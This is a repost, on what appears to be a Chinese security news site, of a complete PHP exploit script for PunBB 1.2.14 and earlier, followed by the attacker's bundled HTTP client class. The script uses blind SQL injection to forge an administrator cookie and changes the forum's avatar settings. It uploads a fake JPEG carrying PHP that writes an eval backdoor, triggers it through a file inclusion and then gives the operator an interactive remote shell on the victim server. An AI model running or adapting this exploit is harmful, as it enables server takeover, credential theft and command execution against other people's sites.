首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PunBB <= 1.2.14 Remote Code Execution Exploit 来源：http://www.acid-root.new.fr/ 作者：DarkFig 发布时间：2007-04-12   #!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); if($argc < 7) { print(" -----------  PunBB <= 1.2.14 Remote Code Execution Exploit  ----------- ----------------------------------------------------------------------- PHP conditions: See www.acid-root.new.fr/advisories/13070411.txt        Credits: DarkFig <gmdarkfig@gmail.com>            URL: http://www.acid-root.new.fr/ -----------------------------------------------------------------------   Usage: $argv[0] -url <> -usr <> -pwd <> [Options] Params: -url       For example http://victim.com/punBB/          -usr       User account (1 post at least)          -pwd       Password account Options: -uid       Admin id (default=2)          -prefix    Table prefix (default=none)          -proxy     If you wanna use a proxy <proxyhost:proxyport>          -proxyauth Basic authentification <proxyuser:proxypwd> ----------------------------------------------------------------------- ");exit(1); } $url = getparam('url',1); $usr = getparam('usr',1); $pwd = getparam('pwd',1); $uid = (getparam('uid')!='') ? getparam('uid') : 2; $pre = getparam('prefix'); $prox= getparam('proxy'); $proh= getparam('proxyauth'); $xpl = new phpsploit(); $xpl->agent("Mozilla Firefox"); if(!empty($prox)) $xpl->addproxy($prox); if(!empty($proh)) $xpl->proxyauth($proh); $xpl->cookiejar(1); $xpl->post($url.'login.php?action=in',"form_sent=1&redirect_url=x&req_username=$usr&req_password=$pwd&login=1"); print "\nCookie hash: ";$cookie = blind($uid); print "\nAdmin cookie: ".$cookie; # Logged in as Administrator $xpl->reset('cookie'); $xpl->addcookie($cookie); # Avatars dir -> include/user # Default options (french) $data = 'form_sent=1&form%5Bboard_title%5D=Mon+forum+punBB&form%5Bboar' .'d_desc%5D=Malheureusement+personne+ne+peut+vous+dire+ce+que+' .'PunBB+est+-+vous+devez+le+voir+par+vous-m%EAme.&form%5Bbase_' .'url%5D='.urlencode(preg_replace("#(.*)/$#","$1",$url)).'&form%5B' .'server_timezone%5D=0&form%5Bdefault_lang%5D=English&form%5Bd' .'efault_style%5D=Oxygen&form%5Btime_format%5D=H%3Ai%3As&form%' .'5Bdate_format%5D=d-m-Y&form%5Btimeout_visit%5D=600&form%5Bti' .'meout_online%5D=300&form%5Bredirect_delay%5D=1&form%5Bshow_v' .'ersion%5D=0&form%5Bshow_user_info%5D=1&form%5Bshow_post_coun' .'t%5D=1&form%5Bsmilies%5D=1&form%5Bsmilies_sig%5D=1&form%5Bma' .'ke_links%5D=1&form%5Btopic_review%5D=15&form%5Bdisp_topics_d' .'efault%5D=30&form%5Bdisp_posts_default%5D=25&form%5Bindent_n' .'um_spaces%5D=4&form%5Bquickpost%5D=1&form%5Busers_online%5D=' .'1&form%5Bcensoring%5D=0&form%5Branks%5D=1&form%5Bshow_dot%5D' .'=0&form%5Bquickjump%5D=1&form%5Bgzip%5D=0&form%5Bsearch_all_' .'forums%5D=1&form%5Badditional_navlinks%5D=&form%5Breport_met' .'hod%5D=0&form%5Bregs_report%5D=0&form%5Bmailing_list%5D=gmda' .'rkfig%40gmail.com&form%5Bavatars%5D=1&form%5Bavatars_dir%5D=' .'include%2Fuser&form%5Bavatars_width%5D=60&form%5Bavatars_hei' .'ght%5D=60&form%5Bavatars_size%5D=10240&form%5Badmin_email%5D' .'=mysploiti%40gmail.com&form%5Bwebmaster_email%5D=mysploiti%4' .'0gmail.com&form%5Bsubscriptions%5D=1&form%5Bsmtp_host%5D=&fo' .'rm%5Bsmtp_user%5D=&form%5Bsmtp_pass%5D=&form%5Bregs_allow%5D' .'=1&form%5Bregs_verify%5D=0&form%5Brules%5D=0&form%5Brules_me' .'ssage%5D=Saisissez+vos+r%E8gles+ici.&form%5Bannouncement%5D=' .'0&form%5Bannouncement_message%5D=Saisissez+votre+annonce+ici' .'.&form%5Bmaintenance%5D=0&form%5Bmaintenance_message%5D=Les+' .'forums+sont+temporairement+ferm%E9s+pour+des+raisons+de+main' .'tenance.+Veuillez+essayer+%E0+nouveau+dans+quelques+minutes.' .'%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%2FAdministrateur&save=+' .'Enregistrer+'; $xpl->addheader('Referer',$url.'admin_options.php'); $xpl->post($url.'admin_options.php?action=foo',$data); # Fake JPG 1x1 # # 000000A2 3C3F 7068 7020 2468 616E 646C 653D 666F <?php $handle=fo # 000000B2 7065 6E28 222E 2F69 6D67 2F61 7661 7461 pen("./img/avata # 000000C2 7273 2F62 6163 6B64 6F6F 722E 7068 7022 rs/backdoor.php" # 000000D2 2C22 7722 293B 2066 7772 6974 6528 2468 ,"w"); fwrite($h # 000000E2 616E 646C 652C 273C 3F70 6870 2069 6628 andle,'<?php if( # 000000F2 6973 7365 7428 245F 5345 5256 4552 5B22 isset($_SERVER[" # 00000102 4854 5450 5F53 4845 4C4C 225D 2929 2040 HTTP_SHELL"])) @ # 00000112 6576 616C 2824 5F53 4552 5645 525B 2248 eval($_SERVER["H # 00000122 5454 505F 5348 454C 4C22 5D29 3B20 3F3E TTP_SHELL"]); ?\> # 00000132 2729 3B20 6663 6C6F 7365 2824 6861 6E64 '); fclose($hand # 00000142 6C65 293B 203F 3E                       le); ?\>    $avatar = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x01\x01\x00\x60" ."\x00\x60\x00\x00\xFF\xDB\x00\x43\x00\x08\x06\x06\x07\x06\x05" ."\x08\x07\x07\x07\x09\x09\x08\x0A\x0C\x14\x0D\x0C\x0B\x0B\x0C" ."\x19\x12\x13\x0F\x14\x1D\x1A\x1F\x1E\x1D\x1A\x1C\x1C\x20\x24" ."\x2E\x27\x20\x22\x2C\x23\x1C\x1C\x28\x37\x29\x2C\x30\x31\x34" ."\x34\x34\x1F\x27\x39\x3D\x38\x32\x3C\x2E\x33\x34\x32\xFF\xDB" ."\x00\x43\x01\x09\x09\x09\x0C\x0B\x0C\x18\x0D\x0D\x18\x32\x21" ."\x1C\x21\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" ."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" ."\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32" ."\x32\x32\x32\x32\x32\x32\x32\xFF\xFE\x00\xA9\x3C\x3F\x70\x68" ."\x70\x20\x24\x68\x61\x6E\x64\x6C\x65\x3D\x66\x6F\x70\x65\x6E" ."\x28\x22\x2E\x2F\x69\x6D\x67\x2F\x61\x76\x61\x74\x61\x72\x73" ."\x2F\x62\x61\x63\x6B\x64\x6F\x6F\x72\x2E\x70\x68\x70\x22\x2C" ."\x22\x77\x22\x29\x3B\x20\x66\x77\x72\x69\x74\x65\x28\x24\x68" ."\x61\x6E\x64\x6C\x65\x2C\x27\x3C\x3F\x70\x68\x70\x20\x69\x66" ."\x28\x69\x73\x73\x65\x74\x28\x24\x5F\x53\x45\x52\x56\x45\x52" ."\x5B\x22\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x22\x5D\x29" ."\x29\x20\x40\x65\x76\x61\x6C\x28\x24\x5F\x53\x45\x52\x56\x45" ."\x52\x5B\x22\x48\x54\x54\x50\x5F\x53\x48\x45\x4C\x4C\x22\x5D" ."\x29\x3B\x20\x3F\x3E\x27\x29\x3B\x20\x66\x63\x6C\x6F\x73\x65" ."\x28\x24\x68\x61\x6E\x64\x6C\x65\x29\x3B\x20\x3F\x3E\xFF\xC0" ."\x00\x11\x08\x00\x01\x00\x01\x03\x01\x22\x00\x02\x11\x01\x03" ."\x11\x01\xFF\xC4\x00\x1F\x00\x00\x01\x05\x01\x01\x01\x01\x01" ."\x01\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06" ."\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5\x10\x00\x02\x01\x03\x03" ."\x02\x04\x03\x05\x05\x04\x04\x00\x00\x01\x7D\x01\x02\x03\x00" ."\x04\x11\x05\x12\x21\x31\x41\x06\x13\x51\x61\x07\x22\x71\x14" ."\x32\x81\x91\xA1\x08\x23\x42\xB1\xC1\x15\x52\xD1\xF0\x24\x33" ."\x62\x72\x82\x09\x0A\x16\x17\x18\x19\x1A\x25\x26\x27\x28\x29" ."\x2A\x34\x35\x36\x37\x38\x39\x3A\x43\x44\x45\x46\x47\x48\x49" ."\x4A\x53\x54\x55\x56\x57\x58\x59\x5A\x63\x64\x65\x66\x67\x68" ."\x69\x6A\x73\x74\x75\x76\x77\x78\x79\x7A\x83\x84\x85\x86\x87" ."\x88\x89\x8A\x92\x93\x94\x95\x96\x97\x98\x99\x9A\xA2\xA3\xA4" ."\xA5\xA6\xA7\xA8\xA9\xAA\xB2\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA" ."\xC2\xC3\xC4\xC5\xC6\xC7\xC8\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7" ."\xD8\xD9\xDA\xE1\xE2\xE3\xE4\xE5\xE6\xE7\xE8\xE9\xEA\xF1\xF2" ."\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF\xC4\x00\x1F\x01\x00\x03" ."\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00" ."\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0A\x0B\xFF\xC4\x00\xB5" ."\x11\x00\x02\x01\x02\x04\x04\x03\x04\x07\x05\x04\x04\x00\x01" ."\x02\x77\x00\x01\x02\x03\x11\x04\x05\x21\x31\x06\x12\x41\x51" ."\x07\x61\x71\x13\x22\x32\x81\x08\x14\x42\x91\xA1\xB1\xC1\x09" ."\x23\x33\x52\xF0\x15\x62\x72\xD1\x0A\x16\x24\x34\xE1\x25\xF1" ."\x17\x18\x19\x1A\x26\x27\x28\x29\x2A\x35\x36\x37\x38\x39\x3A" ."\x43\x44\x45\x46\x47\x48\x49\x4A\x53\x54\x55\x56\x57\x58\x59" ."\x5A\x63\x64\x65\x66\x67\x68\x69\x6A\x73\x74\x75\x76\x77\x78" ."\x79\x7A\x82\x83\x84\x85\x86\x87\x88\x89\x8A\x92\x93\x94\x95" ."\x96\x97\x98\x99\x9A\xA2\xA3\xA4\xA5\xA6\xA7\xA8\xA9\xAA\xB2" ."\xB3\xB4\xB5\xB6\xB7\xB8\xB9\xBA\xC2\xC3\xC4\xC5\xC6\xC7\xC8" ."\xC9\xCA\xD2\xD3\xD4\xD5\xD6\xD7\xD8\xD9\xDA\xE2\xE3\xE4\xE5" ."\xE6\xE7\xE8\xE9\xEA\xF2\xF3\xF4\xF5\xF6\xF7\xF8\xF9\xFA\xFF" ."\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00\x3F\x00\xF7\xFA" ."\x28\xA2\x80\x3F\xFF\xD9"; # Upload $formdata = array(frmdt_url => $url.'profile.php?action=upload_avatar2&id='.$uid,                   'form_sent' => '1',                   'MAX_FILE_SIZE' => '10240',                   'upload' => 'T�l�charger',                   'req_file' => array(frmdt_filename => 'pic.jpg',                                       frmdt_type => 'image/jpeg',                                       frmdt_content => $avatar)); $xpl->addheader('Referer',$url.'profile.php'); $xpl->formdata($formdata); # File inclusion $xpl->addheader('Referer',$url."misc.php\"><pun_include \"$uid.jpg\">"); $xpl->get($url.'misc.php?email='.$uid); print "\nThe php code shoulb be executed\n\$shell> "; # Hello while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) {     # ');include('../../config.php');print $db_password;//     $xpl->addheader('Shell',"system('$cmd');");     $xpl->get($url.'img/avatars/backdoor.php');     print $xpl->getcontent()."\n\$shell> "; } function blind($id) { global $xpl,$url,$usr,$pre; preg_match("#^(\S*)=(\S*);#",$xpl->showcookie(),$cookies); $name=$cookies[1]."="; $string="a:2:{i:0;s:1:\"$id\";i:1;s:32:\""; for($i=1;$i<=32;$i++) { $charset = '0123456789abcdef'; for($a=0;$a<=strlen($charset);$a++) { # Search cache $searchd = 'search.php?action=search&keywords=*****&author='           .$usr.'&forum=-1&search_in=all&sort_by=0&sort_dir=DESC&show_as=topics&search=1'; $xpl->get($url.$searchd); # Cookie hash $sql = 'ORD(SUBSTR(('       .'SELECT MD5('       .'CONCAT('       .'SUBSTR('       .'MD5('       # Cookie seed       .'(SELECT registered FROM '.$pre.'users WHERE LENGTH(registered)=10'       .' ORDER BY registered LIMIT 1)),-8),'       # Hashed password       .'(SELECT password FROM '.$pre.'users WHERE id='.$id.')))),'.$i.',1))=ORD(CHAR('.ord($charset[$a]).')) #';       # SQL Injection $xpl->post($url.'search.php?action=show_new','search_id=-1 OR '.$sql.'&1986084953=1&-1234899993=1'); # True if(preg_match('#<th class="tcr" scope="col">#',$xpl->getcontent())) { print $charset[$a]; $string .= $charset[$a]; break; } } } return $name.urlencode($string.'";}'); } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) return $argv[$value+1]; } if($opt) exit("\n#3 -$param parameter required"); else return; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA. * * TITLE:          PhpSploit Class * REQUIREMENTS:   PHP 5 (remove "private", "public" if you have PHP 4) * VERSION:        1.2 * LICENSE:        GNU General Public License * ORIGINAL URL:   http://www.acid-root.new.fr/tools/03061230.txt * FILENAME:       phpsploitclass.php * * CONTACT:        gmdarkfig@gmail.com (french / english) * GREETZ:         Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * [2007-01-24] (1.2) *  * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) *  * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) *  * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) *  * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) *  * First version * */ class phpsploit { /** * This function is called by the get()/post() functions. * You don't have to call it, this is the main function. * * @return $server_response */ private function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); else $socket = fsockopen($this->host,$this->port); if(!$socket) die("Error: The host doesn't exist"); if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n"; elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n"; $this->packet .= "Host: ".$this->host."\r\n"; if(!empty($this->agent))  $this->packet .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->header)) $this->packet .= $this->header."\r\n"; if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method==="post") { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method==="formdata") { $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); if($this->allowredirection) return $this->allowredirection($this->recv); else return $this->recv; } /** * This function allows you to add several cookie in the * request. Several methods are supported: * * $this->addcookie("name","value"); * or * $this->addcookie("name=newvalue"); * or * $this->addcookie("othername=overvalue; xx=zz; y=u"); * * @param string $cookiename * @param string $cookievalue * */ public function addcookie($cookn,$cookv='') { // $this->addcookie("name","value"); work avec replace if(!empty($cookv)) { if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete if(!empty($this->cookie)) {     if(preg_match("/$cookn=/",$this->cookie))     {     $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);     }     else     {     $this->cookie .= " ".$cookn."=".$cookv.";"; // " ".     } } else { $this->cookie = $cookn."=".$cookv.";"; } } // $this->addcookie("name=value; othername=othervalue"); else {     if(!empty($this->cookie))     {     $cookn = preg_replace("/(.*);$/","$1",$cookn);     $cookarr = explode(";",str_replace(" ", "",$cookn));     for($i=0;$i<count($cookarr);$i++)     {     preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches);     $cookn = $matches[1];     $cookv = $matches[2];     $this->addcookie($cookn,$cookv);     }     } else { $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; $this->cookie = $cookn; } } } /** * This function allows you to add several headers in the * request. Several methods are supported: * * $this->addheader("headername","headervalue"); * or * $this->addheader("headername: headervalue"); * * @param string $headername * @param string $headervalue */ public function addheader($headern,$headervalue='') { // $this->addheader("name","value"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match("/$headern:/",$this->header)) { $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header); } else { $this->header .= "\r\n".$headern.": ".$headervalue; } } else { $this->header=$headern.": ".$headervalue; } } // $this->addheader("name: value"); else { if(!empty($this->header)) { $headarr = explode(": ",$headern); $headern = $headarr[0]; $headerv = $headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** * This function allows you to use an http proxy server. * Several methods are supported: * * $this->proxy("proxyip","8118"); * or * $this->proxy("proxyip:8118") * * @param string $proxyhost * @param integer $proxyport */ public function proxy($proxy,$proxyp='') { // $this->proxy("localhost:8118"); if(empty($proxyp)) { preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr); $proxh = $proxarr[1]; $proxp = $proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } // $this->proxy("localhost",8118); else { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an http proxy server * which requires a basic authentification. Several * methods are supported: * * $this->proxyauth("darkfig","dapasswd"); * or * $this->proxyauth("darkfig:dapasswd"); * * @param string $proxyuser * @param string $proxypass */ public function proxyauth($proxyauth,$proxypasse='') { // $this->proxyauth("darkfig:password"); if(empty($proxypasse)) { preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr); $proxu = $proxautharr[1]; $proxp = $proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } // $this->proxyauth("darkfig","password"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** * This function allows you to set the "User-Agent" header. * Several methods are possible to do that: * * $this->agent("Mozilla Firefox"); * or * $this->addheader("User-Agent: Mozilla Firefox"); * or * $this->addheader("User-Agent","Mozilla Firefox"); * * @param string $useragent */ public function agent($useragent) { $this->agent=$useragent; } /** * This function returns the header which will be * in the next request. * * $this->showheader(); * * @return $header */ public function showheader() { return $this->header; } /** * This function returns the cookie which will be * in the next request. * * $this->showcookie(); * * @return $storedcookies */ public function showcookie() { return $this->cookie; } /** * This function returns the last formed * http request (the http packet). * * $this->showlastrequest(); * * @return $last_http_request */ public function showlastrequest() { return $this->packet; } /** * This function sends the formed http packet with the * GET method. You can precise the port of the host. * * $this->get("http://localhost"); * $this->get("http://localhost:888/xd/tst.php"); * * @param string $urlwithpath * @return $server_response */ public function get($url) { $this->target($url); $this->method="get"; return $this->sock(); } /** * This function sends the formed http packet with the * POST method. You can precise the port of the host. * * $this->post("http://localhost/index.php","admin=1&user=dark"); * * @param string $urlwithpath * @param string $postdata * @return $server_response */ public function post($url,$data) { $this->target($url); $this->method="post"; $this->data=$data; return $this->sock(); } /** * This function sends the formed http packet with the * POST method using the multipart/form-data enctype. * * $array = array( *          frmdt_url      => "http://localhost/upload.php", *          frmdt_boundary => "123456",                    # Optional *                 "email" => "me@u.com", *               "varname" => array( *                            frmdt_type => "image/gif",   # Optional *                       frmdt_transfert => "binary",      # Optional *                        frmdt_filename => "hello.php", *                         frmdt_content => "<?php echo ':)'; ?>")); * $this->formdata($array); * * @param array $array * @return $server_response */ public function formdata($array) { $this->target($array[frmdt_url]); $this->method="formdata"; $this->data=''; if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit"; else $this->boundary=$array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match("#^frmdt_(boundary|url)#",$key)) { $this->data .= "-----------------------------".$this->boundary."\r\n"; $this->data .= "Content-Disposition: form-data; name=\"".$key."\";"; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= "-----------------------------".$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content of the server response * without the headers. * * $this->getcontent($this->get("http://localhost/")); * or * $this->getcontent(); * * @param string $server_response * @return $onlythecontent */ public function getcontent($code='') { if(empty($code)) $code = $this->recv; $content = explode("\n",$code); $onlycode = ''; for($i=1;$i<count($content);$i++) { if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1; if($ok) $onlycode .= $content[$i]."\n"; } return $onlycode; } /** * This function returns the headers of the server response * without the content. * * $this->getheader($this->post("http://localhost/x.php","x=1&z=2")); * or * $this->getheader(); * * @param string $server_response * @return $onlytheheaders */ public function getheader($code='') { if(empty($code)) $code = $this->recv; $header = explode("\n",$code); $onlyheader = $header[0]."\n"; for($i=1;$i<count($header);$i++) { if(!preg_match("/^(\S*):/",$header[$i])) break; $onlyheader .= $header[$i]."\n"; } return $onlyheader; } /** * This function is called by the cookiejar() function. * It adds the value of the "Set-Cookie" header in the "Cookie" * header for the next request. You don't have to call it. * * @param string $server_response */ private function getcookie($code) { $carr = explode("\n",str_replace("\r\n","\n",$code)); for($z=0;$z<count($carr);$z++) { if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr)) { $cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1])); } } for($i=0;$i<count($cookie);$i++) { preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches);             $cookn = $matches[1];             $cookv = $matches[2];             $this->addcookie($cookn,$cookv); }     } /** * This function is called by the get()/post() functions. * You don't have to call it. * * @param string $urltarg */ private function target($urltarg) { if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/"; $this->url=$urltarg; $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg))); $this->host=$array[0]; preg_match("/:(\d+)\//",$urltarg,$matches); $this->port=empty($matches[1]) ? 80 : $matches[1]; $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)); preg_match("/\/(.*)\//",$temp,$matches); $this->path=str_replace("//","/","/".$matches[1]."/"); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, the script will * extract all "Set-Cookie" headers values * and it will automatically add them into the "Cookie" header * for all next requests. * * $this->cookiejar(1); // enabled * $this->cookiejar(0); // disabled * */ public function cookiejar($code) { if($code===0) $this->cookiejar=''; if($code===1) $this->cookiejar=1; else { $this->getcookie($code); } } /** * If you call this function, the script will * follow all redirections sent by the server. * * $this->allowredirection(1); // enabled * $this->allowredirection(0); // disabled * * @return $this->get($locationresponse) */ public function allowredirection($code) { if($code===0) $this->allowredirection=''; if($code===1) $this->allowredirection=1; else { if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) { $location = str_replace(chr(13),'',$codearr[2]); if(!eregi("://",$location)) { return $this->get("http://".$this->host.$this->path.$location); } else { return $this->get($location); } } else { return $code; } } } /** * This function allows you to reset some parameters: * * $this->reset(header); // headers cleaned * $this->reset(cookie); // cookies cleaned * $this->reset();       // clean all parameters * * @param string $func */ public function reset($func='') { switch($func) { case "header": $this->header=''; break; case "cookie": $this->cookie=''; break; default:         $this->cookiejar='';         $this->header='';         $this->cookie='';         $this->allowredirection='';         $this->agent='';         break; } } } ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·MiniWebsvr 0.0.7 Remote Direct ·Sami HTTP Server 2.0.1 POST Re ·InoutMailingListManager <= 3.1 ·mxBB Module MX Shotcast 1.0 RC ·MS Windows Animated Cursor (.A ·MyBulletinBoard (MyBB) <= 1.2. ·IrfanView 3.99 .ANI File Local ·Aircrack-ng 0.7 (specially cra ·Windows DNS RPC Remote Code Ex ·NMDeluxe 1.0.1 (footer.php tem ·Apache Mod_Rewrite Off-by-one ·XAMPP for Windows <= 1.6.0a ms   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved